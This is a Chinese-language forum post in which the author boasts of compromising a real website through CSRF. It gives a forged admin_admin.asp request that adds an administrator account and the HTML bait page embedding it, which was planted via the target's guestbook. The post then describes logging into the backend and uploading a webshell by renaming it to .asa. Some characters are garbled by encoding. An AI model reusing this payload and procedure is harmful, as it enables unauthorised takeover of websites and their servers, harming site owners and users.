最近想測試一下用CSRF來搞一個(gè)站有多快？  于是乎就測試了一下，結(jié)果還是挺讓人滿意的。廢話不多說了， 切入正題。 文章沒技術(shù)含量，望高手別捧腹大笑 - -||

我從源碼站里下了一套源碼，名曰：art2008  我是從增加管理員這里進(jìn)行CSRF的， 同過抓包 我發(fā)現(xiàn)，構(gòu)造一個(gè)鏈接如：

http://www.xxx.com/admin/admin_admin.asp?
action=savenew&username=11111&PrUserName=11111&
passwd=123456&passwd2=123456&sex=%CF%C8%C9%FA&
fullname=%B9%FE%B9%FE&email=xss@qq.com&
depname=jiasdf&dj=1&B1=+%CC%E1+++%BD%BB+[code] 

就能夠自動增加一個(gè)管理員，  于是乎測試了一下，發(fā)現(xiàn)可以增加。然后便開始找對象進(jìn)行試驗(yàn)..

google了一下 ， 找了個(gè)管理員經(jīng)常上的網(wǎng)站進(jìn)行了測試， 然后我先是在自己空間上建立了以個(gè)test.htm 代碼如下：

[code]你喜歡包拯嗎？ 
http://www.xxx(名字略).com/admin/admin_admin.asp?
action=savenew&username=111111&
PrUserName=111111&passwd=123456&
passwd2=123456&sex=%CF%C8%C9%FA&
fullname=%B9%FE%B9%FE&email=xss@qq.com&
depname=jiasdf&dj=1&B1=+%CC%E1+++%BD%BB+" width="0" height="100">

然后找到那個(gè)網(wǎng)站的留言板，開始留言，如圖： 

當(dāng)管理員訪問我的網(wǎng)站時(shí)候，他便被CSRF了。。 就在此后， 我便去玩CS了，戰(zhàn)績還不錯(cuò)- - 殺16死5.

當(dāng)我回來時(shí)候，管理員已經(jīng)回復(fù)了（- - ||真快阿）如圖：

管理員應(yīng)該訪問了我的網(wǎng)站，于是我迅雷不及掩耳之勢的跑去后臺看看有沒有成功增加，用戶名：111111 密碼：123456  結(jié)果成功登陸了！！ 如圖：

后臺后個(gè)上傳，改了一下擴(kuò)展名asa  ，馬兒便飛到了服務(wù)器上，  如圖：

大概計(jì)算了一下，一共花費(fèi)了約30分鐘左右的時(shí)間。